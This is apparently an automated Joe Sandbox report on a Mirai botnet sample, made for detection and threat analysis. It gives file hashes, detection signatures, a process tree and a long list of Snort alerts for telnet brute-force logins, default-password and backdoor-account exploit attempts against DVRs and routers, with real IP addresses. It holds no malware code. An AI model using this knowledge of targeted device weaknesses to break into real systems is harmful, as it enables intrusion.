Play interactive tour

Edit tour

Linux Analysis Report TudQawdlbF

Overview

General Information

Sample Name:	TudQawdlbF
Analysis ID:	553219
MD5:	c334e7bb5fe6853b0654ef0207106832
SHA1:	8e214ec8b0e9b3725a5f0dbf0c70a391ca044bb3
SHA256:	f4b66f5bfca612afe7d4d0d430511fedbc247eb91ab65c99c5ae7524a4af4e1b
Tags:	32elfmirairenesas
Infos:

Detection

Mirai

Score:	68
Range:	0 - 100
Whitelisted:	false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Uses known network protocols on non-standard ports

Sample has stripped symbol table

Uses the "uname" system call to query kernel version information (possible evasion)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Detected TCP or UDP traffic on non-standard ports

Executes the "rm" command used to delete files or directories

Sample listens on a socket

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work

Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	553219
Start date:	14.01.2022
Start time:	13:53:53
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 31s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	TudQawdlbF
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal68.troj.lin@0/0@0/0
Warnings:	Show All Report size exceeded maximum capacity and may have missing network information. TCP Packets have been reduced to 100

Process Tree

system is lnxubuntu20

TudQawdlbF (PID: 5209, Parent: 5106, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/TudQawdlbF

TudQawdlbF New Fork (PID: 5211, Parent: 5209)

TudQawdlbF New Fork (PID: 5213, Parent: 5211)

TudQawdlbF New Fork (PID: 5214, Parent: 5211)

TudQawdlbF New Fork (PID: 5216, Parent: 5211)

dash New Fork (PID: 5258, Parent: 4331)

rm (PID: 5258, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.XirojNzOMl /tmp/tmp.CnxdzwO3rm /tmp/tmp.iXnCqWUK00

cleanup

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Mirai_12	Yara detected Mirai	Joe Security

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: TudQawdlbF	Virustotal: Detection: 44%	Perma Link
Source: TudQawdlbF	Metadefender: Detection: 40%	Perma Link
Source: TudQawdlbF	ReversingLabs: Detection: 55%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 81.230.181.104: -> 192.168.2.23:
Source: Traffic	Snort IDS: 716 INFO TELNET access 103.110.109.38:23 -> 192.168.2.23:46502
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 220.175.169.219:23 -> 192.168.2.23:45990
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 83.167.253.101:23 -> 192.168.2.23:40688
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 83.167.253.101:23 -> 192.168.2.23:40688
Source: Traffic	Snort IDS: 2023447 ET TROJAN Possible Linux.Mirai Login Attempt (service) 192.168.2.23:41010 -> 83.167.253.101:23
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 220.175.169.219:23 -> 192.168.2.23:46206
Source: Traffic	Snort IDS: 716 INFO TELNET access 66.26.208.57:23 -> 192.168.2.23:38360
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 151.59.118.226:23 -> 192.168.2.23:56828
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 151.59.118.226:23 -> 192.168.2.23:56828
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 111.70.17.253:23 -> 192.168.2.23:52534
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 111.70.17.253:23 -> 192.168.2.23:52534
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 83.167.253.101:23 -> 192.168.2.23:41010
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 83.167.253.101:23 -> 192.168.2.23:41010
Source: Traffic	Snort IDS: 2023448 ET TROJAN Possible Linux.Mirai Login Attempt (ubnt) 192.168.2.23:58318 -> 80.229.182.144:23
Source: Traffic	Snort IDS: 2023447 ET TROJAN Possible Linux.Mirai Login Attempt (service) 192.168.2.23:58964 -> 108.49.84.154:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 108.49.84.154:23 -> 192.168.2.23:58964
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 108.49.84.154:23 -> 192.168.2.23:58964
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:58720 -> 80.229.182.144:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 102.64.33.3:23 -> 192.168.2.23:33418
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 102.64.33.3:23 -> 192.168.2.23:33418
Source: Traffic	Snort IDS: 716 INFO TELNET access 173.15.212.13:23 -> 192.168.2.23:49254
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 83.167.253.101:23 -> 192.168.2.23:41652
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 83.167.253.101:23 -> 192.168.2.23:41652
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 220.175.169.219:23 -> 192.168.2.23:47018
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:59096 -> 80.229.182.144:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.238.250.238:23 -> 192.168.2.23:32928
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 151.59.118.226:23 -> 192.168.2.23:57508
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 151.59.118.226:23 -> 192.168.2.23:57508
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 111.70.17.253:23 -> 192.168.2.23:53606
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 111.70.17.253:23 -> 192.168.2.23:53606
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 114.29.154.203:23 -> 192.168.2.23:36482
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 114.29.154.203:23 -> 192.168.2.23:36482
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:35442
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 113.178.255.226:23 -> 192.168.2.23:44256
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 113.178.255.226:23 -> 192.168.2.23:44256
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:35510
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 123.195.185.123:23 -> 192.168.2.23:34082
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 123.195.185.123:23 -> 192.168.2.23:34082
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:36982 -> 114.29.154.203:23
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:35636
Source: Traffic	Snort IDS: 2023447 ET TROJAN Possible Linux.Mirai Login Attempt (service) 192.168.2.23:48256 -> 14.163.148.3:23
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:35734
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 83.167.253.101:23 -> 192.168.2.23:42434
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 83.167.253.101:23 -> 192.168.2.23:42434
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:35818
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.163.148.3:23 -> 192.168.2.23:48256
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.163.148.3:23 -> 192.168.2.23:48256
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 102.64.33.3:23 -> 192.168.2.23:34540
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 102.64.33.3:23 -> 192.168.2.23:34540
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 114.29.154.203:23 -> 192.168.2.23:36982
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 114.29.154.203:23 -> 192.168.2.23:36982
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:35916
Source: Traffic	Snort IDS: 716 INFO TELNET access 103.110.109.38:23 -> 192.168.2.23:48650
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:36002
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.238.250.238:23 -> 192.168.2.23:33788
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:36082
Source: Traffic	Snort IDS: 2025080 ET EXPLOIT Actiontec C1000A backdoor account M1 192.168.2.23:54778 -> 92.207.131.26:23
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:36152
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 220.175.169.219:23 -> 192.168.2.23:48324
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 151.59.118.226:23 -> 192.168.2.23:58638
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 151.59.118.226:23 -> 192.168.2.23:58638
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:36230
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 201.124.54.252:23 -> 192.168.2.23:35542
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 201.124.54.252:23 -> 192.168.2.23:35542
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:36308
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:36406
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 111.70.17.253:23 -> 192.168.2.23:54692
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 111.70.17.253:23 -> 192.168.2.23:54692
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:36484
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 83.167.253.101:23 -> 192.168.2.23:43224
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 83.167.253.101:23 -> 192.168.2.23:43224
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:36574
Source: Traffic	Snort IDS: 716 INFO TELNET access 195.31.212.133:23 -> 192.168.2.23:43628
Source: Traffic	Snort IDS: 716 INFO TELNET access 148.101.85.249:23 -> 192.168.2.23:39636
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 114.29.154.203:23 -> 192.168.2.23:37750
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 114.29.154.203:23 -> 192.168.2.23:37750
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:36636
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 123.195.185.123:23 -> 192.168.2.23:35160
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 123.195.185.123:23 -> 192.168.2.23:35160
Source: Traffic	Snort IDS: 716 INFO TELNET access 66.26.208.57:23 -> 192.168.2.23:40800
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:36734
Source: Traffic	Snort IDS: 215 BACKDOOR MISC Linux rootkit attempt 192.168.2.23:43478 -> 178.45.131.97:23
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:36836
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 102.64.33.3:23 -> 192.168.2.23:35582
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 102.64.33.3:23 -> 192.168.2.23:35582
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 94.228.5.148:23 -> 192.168.2.23:40910
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 94.228.5.148:23 -> 192.168.2.23:40910
Source: Traffic	Snort IDS: 716 INFO TELNET access 14.162.129.24:23 -> 192.168.2.23:55264
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.238.250.238:23 -> 192.168.2.23:34660
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:36922
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:36978
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:37056
Source: Traffic	Snort IDS: 716 INFO TELNET access 148.101.85.249:23 -> 192.168.2.23:40182
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:37106
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 151.59.118.226:23 -> 192.168.2.23:59630
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 151.59.118.226:23 -> 192.168.2.23:59630
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:37174
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 83.167.253.101:23 -> 192.168.2.23:43956
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 83.167.253.101:23 -> 192.168.2.23:43956
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:37260
Source: Traffic	Snort IDS: 716 INFO TELNET access 173.15.212.13:23 -> 192.168.2.23:51606
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:37326
Source: Traffic	Snort IDS: 716 INFO TELNET access 148.101.85.249:23 -> 192.168.2.23:40454
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:37404
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 84.232.240.212:23 -> 192.168.2.23:54022
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 84.232.240.212:23 -> 192.168.2.23:54022
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 108.49.84.154:23 -> 192.168.2.23:33748
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 108.49.84.154:23 -> 192.168.2.23:33748
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:37480
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 111.70.17.253:23 -> 192.168.2.23:55750
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 111.70.17.253:23 -> 192.168.2.23:55750
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 114.29.154.203:23 -> 192.168.2.23:38694
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 114.29.154.203:23 -> 192.168.2.23:38694
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:37570
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:37638
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.238.250.238:23 -> 192.168.2.23:35408
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 123.195.185.123:23 -> 192.168.2.23:36176
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 123.195.185.123:23 -> 192.168.2.23:36176
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 102.64.33.3:23 -> 192.168.2.23:36474
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 102.64.33.3:23 -> 192.168.2.23:36474
Source: Traffic	Snort IDS: 716 INFO TELNET access 42.7.6.90:23 -> 192.168.2.23:53090
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:37716
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 192.156.225.252: -> 192.168.2.23:
Source: Traffic	Snort IDS: 716 INFO TELNET access 148.101.85.249:23 -> 192.168.2.23:40746
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:37790
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:37848
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 83.167.253.101:23 -> 192.168.2.23:44636
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 83.167.253.101:23 -> 192.168.2.23:44636
Source: Traffic	Snort IDS: 716 INFO TELNET access 173.243.89.2:23 -> 192.168.2.23:33262
Source: Traffic	Snort IDS: 716 INFO TELNET access 31.211.66.11:23 -> 192.168.2.23:42724
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:37920
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 114.29.154.203:23 -> 192.168.2.23:39194
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 114.29.154.203:23 -> 192.168.2.23:39194
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:37996
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 151.59.118.226:23 -> 192.168.2.23:60512
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 151.59.118.226:23 -> 192.168.2.23:60512
Source: Traffic	Snort IDS: 716 INFO TELNET access 148.101.85.249:23 -> 192.168.2.23:41152
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:38050
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 84.232.240.212:23 -> 192.168.2.23:54712
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 84.232.240.212:23 -> 192.168.2.23:54712
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:38094
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 31.211.66.11:23 -> 192.168.2.23:42724
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 31.211.66.11:23 -> 192.168.2.23:42724
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:38134
Source: Traffic	Snort IDS: 2025080 ET EXPLOIT Actiontec C1000A backdoor account M1 192.168.2.23:37212 -> 102.64.33.3:23
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:38186
Source: Traffic	Snort IDS: 716 INFO TELNET access 103.110.109.38:23 -> 192.168.2.23:50862
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:38216
Source: Traffic	Snort IDS: 716 INFO TELNET access 102.219.153.138:23 -> 192.168.2.23:56898
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.238.250.238:23 -> 192.168.2.23:35988
Source: Traffic	Snort IDS: 2023448 ET TROJAN Possible Linux.Mirai Login Attempt (ubnt) 192.168.2.23:39732 -> 114.29.154.203:23
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:38266
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 111.70.17.253:23 -> 192.168.2.23:56668
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 111.70.17.253:23 -> 192.168.2.23:56668
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 113.178.255.226:23 -> 192.168.2.23:47114
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 113.178.255.226:23 -> 192.168.2.23:47114
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:38320
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 102.64.33.3:23 -> 192.168.2.23:37212
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 102.64.33.3:23 -> 192.168.2.23:37212
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 83.167.253.101:23 -> 192.168.2.23:45120
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 83.167.253.101:23 -> 192.168.2.23:45120
Source: Traffic	Snort IDS: 716 INFO TELNET access 92.126.195.70:23 -> 192.168.2.23:41692
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:38374
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 123.195.185.123:23 -> 192.168.2.23:37018
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 123.195.185.123:23 -> 192.168.2.23:37018
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 92.126.195.70:23 -> 192.168.2.23:41692
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 92.126.195.70:23 -> 192.168.2.23:41692
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:38460
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.163.148.3:23 -> 192.168.2.23:50880
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.163.148.3:23 -> 192.168.2.23:50880
Source: Traffic	Snort IDS: 716 INFO TELNET access 31.211.66.11:23 -> 192.168.2.23:43414
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:38580
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:43710 -> 183.111.234.163:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 195.31.212.133:23 -> 192.168.2.23:45650
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 84.232.240.212:23 -> 192.168.2.23:55168
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 84.232.240.212:23 -> 192.168.2.23:55168
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:38656
Source: Traffic	Snort IDS: 716 INFO TELNET access 66.26.208.57:23 -> 192.168.2.23:42882
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:38714
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 114.29.154.203:23 -> 192.168.2.23:39862
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 114.29.154.203:23 -> 192.168.2.23:39862
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 151.59.118.226:23 -> 192.168.2.23:32954
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 151.59.118.226:23 -> 192.168.2.23:32954
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 72.139.109.79:23 -> 192.168.2.23:47480
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 72.139.109.79:23 -> 192.168.2.23:47480
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 201.124.54.252:23 -> 192.168.2.23:37950
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 201.124.54.252:23 -> 192.168.2.23:37950
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:38770
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 31.211.66.11:23 -> 192.168.2.23:43414
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 31.211.66.11:23 -> 192.168.2.23:43414
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:57430 -> 92.207.131.26:23
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:38838
Source: Traffic	Snort IDS: 716 INFO TELNET access 14.162.129.24:23 -> 192.168.2.23:57236
Source: Traffic	Snort IDS: 2023447 ET TROJAN Possible Linux.Mirai Login Attempt (service) 192.168.2.23:40366 -> 114.29.154.203:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 92.126.195.70:23 -> 192.168.2.23:42086
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:38904
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 92.126.195.70:23 -> 192.168.2.23:42086
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 92.126.195.70:23 -> 192.168.2.23:42086
Source: Traffic	Snort IDS: 716 INFO TELNET access 221.167.240.58:23 -> 192.168.2.23:45320
Source: Traffic	Snort IDS: 716 INFO TELNET access 200.205.62.121:23 -> 192.168.2.23:50062
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.238.250.238:23 -> 192.168.2.23:36712
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:38970
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 200.205.62.121:23 -> 192.168.2.23:50062
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 83.167.253.101:23 -> 192.168.2.23:45746
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 83.167.253.101:23 -> 192.168.2.23:45746
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 221.167.240.58:23 -> 192.168.2.23:45320
Source: Traffic	Snort IDS: 716 INFO TELNET access 153.167.18.137:23 -> 192.168.2.23:34324
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:39018
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 94.228.5.148:23 -> 192.168.2.23:43072
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 94.228.5.148:23 -> 192.168.2.23:43072
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:39108
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 102.64.33.3:23 -> 192.168.2.23:37974
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 102.64.33.3:23 -> 192.168.2.23:37974
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:39168
Source: Traffic	Snort IDS: 716 INFO TELNET access 221.167.240.58:23 -> 192.168.2.23:45594
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 111.70.17.253:23 -> 192.168.2.23:57502
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 111.70.17.253:23 -> 192.168.2.23:57502
Source: Traffic	Snort IDS: 716 INFO TELNET access 200.205.62.121:23 -> 192.168.2.23:50316
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 84.232.240.212:23 -> 192.168.2.23:55852
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 84.232.240.212:23 -> 192.168.2.23:55852
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:39234
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 200.205.62.121:23 -> 192.168.2.23:50316
Source: Traffic	Snort IDS: 716 INFO TELNET access 153.167.18.137:23 -> 192.168.2.23:34580
Source: Traffic	Snort IDS: 716 INFO TELNET access 31.211.66.11:23 -> 192.168.2.23:44094
Source: Traffic	Snort IDS: 716 INFO TELNET access 173.15.212.13:23 -> 192.168.2.23:53506
Source: Traffic	Snort IDS: 716 INFO TELNET access 92.126.195.70:23 -> 192.168.2.23:42474
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 62.122.205.53:23 -> 192.168.2.23:39292
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 123.195.185.123:23 -> 192.168.2.23:37846
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 123.195.185.123:23 -> 192.168.2.23:37846
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 221.167.240.58:23 -> 192.168.2.23:45594
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 92.126.195.70:23 -> 192.168.2.23:42474
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 92.126.195.70:23 -> 192.168.2.23:42474
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:40784 -> 114.29.154.203:23
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:33790 -> 151.59.118.226:23
Source: Traffic	Snort IDS: 215 BACKDOOR MISC Linux rootkit attempt 192.168.2.23:34580 -> 153.167.18.137:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 111.201.69.63:23 -> 192.168.2.23:41020
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 36.69.24.3:23 -> 192.168.2.23:45562
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 209.82.83.130:23 -> 192.168.2.23:54978
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 209.82.83.130:23 -> 192.168.2.23:54978
Source: Traffic	Snort IDS: 716 INFO TELNET access 200.205.62.121:23 -> 192.168.2.23:50502
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 151.59.118.226:23 -> 192.168.2.23:33790
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 151.59.118.226:23 -> 192.168.2.23:33790
